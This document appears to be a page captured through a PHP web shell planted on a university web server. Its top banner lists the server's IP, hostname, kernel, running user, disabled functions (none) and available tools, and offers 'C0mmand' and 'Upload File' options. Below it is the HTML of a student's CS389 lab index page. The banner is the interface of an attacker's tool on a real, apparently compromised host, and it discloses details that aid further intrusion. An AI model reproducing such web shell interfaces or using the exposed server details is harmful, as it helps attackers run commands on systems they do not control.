Server IP : 172.16.15.8 / Your IP : 3.145.106.7 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/akshoop/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<html> <head> <style> body { font-family: "Apple Chancery", cursive; background-color: white; margin: 0; } ul { list-style-type: none; height: 100%; width: 250px; position: fixed; top: 0; left: 0; background-color: #555; overflow: auto; padding-top:20px; padding: 0; margin: 0; } li a { display: block; color: white; padding: 6px 8px 6px 16px; text-decoration: none; font-size: 20px; width: 100%; text-align: left; cursor: pointer; } li a.active { background-color: #81a4db; color: white; } li a:hover:not(.active) { background-color: #81a4db; color: white; } </style> </head> <body> <ul> <li><a href="389index.html">Home</a></li> <li><a class="active" href="labsIndex.html">Labs</a></li> <li><a href="assignmentsIndex.html">Assignments</a></li> <li><a href="projectIndex.html">Project</a></li> </ul> <div style="margin-left:250px;padding:0px 10px;height:1000px;font-size: 20px;"> <h2>Welcome to Abigail's CS389 Homepage: Labs!</h2> <h3> <a href="first.php">First PHP</a><BR> <a href="hello.html">Hello Form</a><BR> <a href="helloALT.html">Hello Alternative</a><BR> <a href="exam.html">Web Exam</a><BR> <a href="le.html">Linear Equation</a><BR> <a href="circleForm.html">Circle Area</a><BR> <a href="selectForm.php">Selection Form</a><BR> <a href="selectFormALT.html">Selection Form Alt.</a><BR> <a href="login.html">Selection Form w/ Password</a><BR> <a href="session1.html">General Calculator</a><BR> <a href="array1.php">PHP Array</a><BR> <a href="array3.php">PHP Associative Array</a><BR> <a href="surveyForm.php">Cafe Survey</a><BR> <a href="surveyForm.html">Cafe Survey HTML</a><BR> <a href="date.php">Date Function</a><BR> <a href="include.php">Include Function</a><BR> <a href="funForm.html">Fun Form</a><BR> <a href="funLab.html">Fun Lab: Read and display N.. 2 1</a><BR> </h3> <h2>Databases:</h2> <h3> <a href="display.php">Display a Table</a><BR> <a href="insertForm.html">Insert Form</a><BR> <a href="search.html">Search for Gender</a><BR> <a href="updateForm.html">Update Records</a><BR> </h3> </div> </body> </html>